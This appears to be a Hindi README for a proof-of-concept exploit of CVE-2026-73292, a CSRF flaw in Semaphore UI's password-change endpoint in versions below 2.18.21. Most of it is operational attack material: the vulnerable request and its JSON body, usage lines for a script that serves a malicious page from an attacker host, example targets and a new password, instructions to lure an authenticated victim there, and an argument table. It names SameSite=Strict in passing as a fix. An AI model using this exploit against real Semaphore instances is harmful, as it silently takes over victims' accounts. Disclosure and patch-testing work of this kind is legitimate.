
CVE-2026-73292 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Semaphore UI पासवर्ड परिवर्तन एंडपॉइंट पर CSRF हमला, एक दुर्भावनापूर्ण पेज परोसता है जो प्रमाणित उपयोगकर्ता के पासवर्ड को चुपचाप रीसेट कर देता है।
केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए।
यह भेद्यता GHSA-8cj9-r88m-8945 में रिपोर्ट की गई है और यह 2.18.21 से नीचे के semaphoreui संस्करणों को प्रभावित करती है।
सेमाफोर UI का पासवर्ड परिवर्तन एंडपॉइंट किसी भी CSRF सुरक्षा को लागू नहीं करता है:
semaphore) पर निर्भर करता है जिसमें कोई SameSite प्रवर्तन नहीं हैएक दुर्भावनापूर्ण पृष्ठ उस पर जाने वाले किसी भी प्रमाणित उपयोगकर्ता का पासवर्ड चुपचाप बदल सकता है।
प्रभावित एंडपॉइंट: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
फिर पीड़ित (सेमाफोर पर प्रमाणित) को http://ATTACKER:1337 पर भेजें। पृष्ठ लोड होते ही उनका पासवर्ड तुरंत बदल जाता है।
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337 पर नेविगेट करें/api/users/1/password पर एक POST को HTTP 204 लौटाते हुए देखेंSameSite=Strict सेट करें| तर्क | विवरण | डिफ़ॉल्ट |
|---|
-u / --uri | सेमाफोर इंस्टेंस का आधार URL | आवश्यक |
-i / --user_id | लक्षित उपयोगकर्ता का ID | आवश्यक |
-n / --new_password | सेट किया जाने वाला पासवर्ड | passwordchanged |
-p / --port | दुर्भावनापूर्ण पृष्ठ को सर्व करने के लिए पोर्ट | 1337 |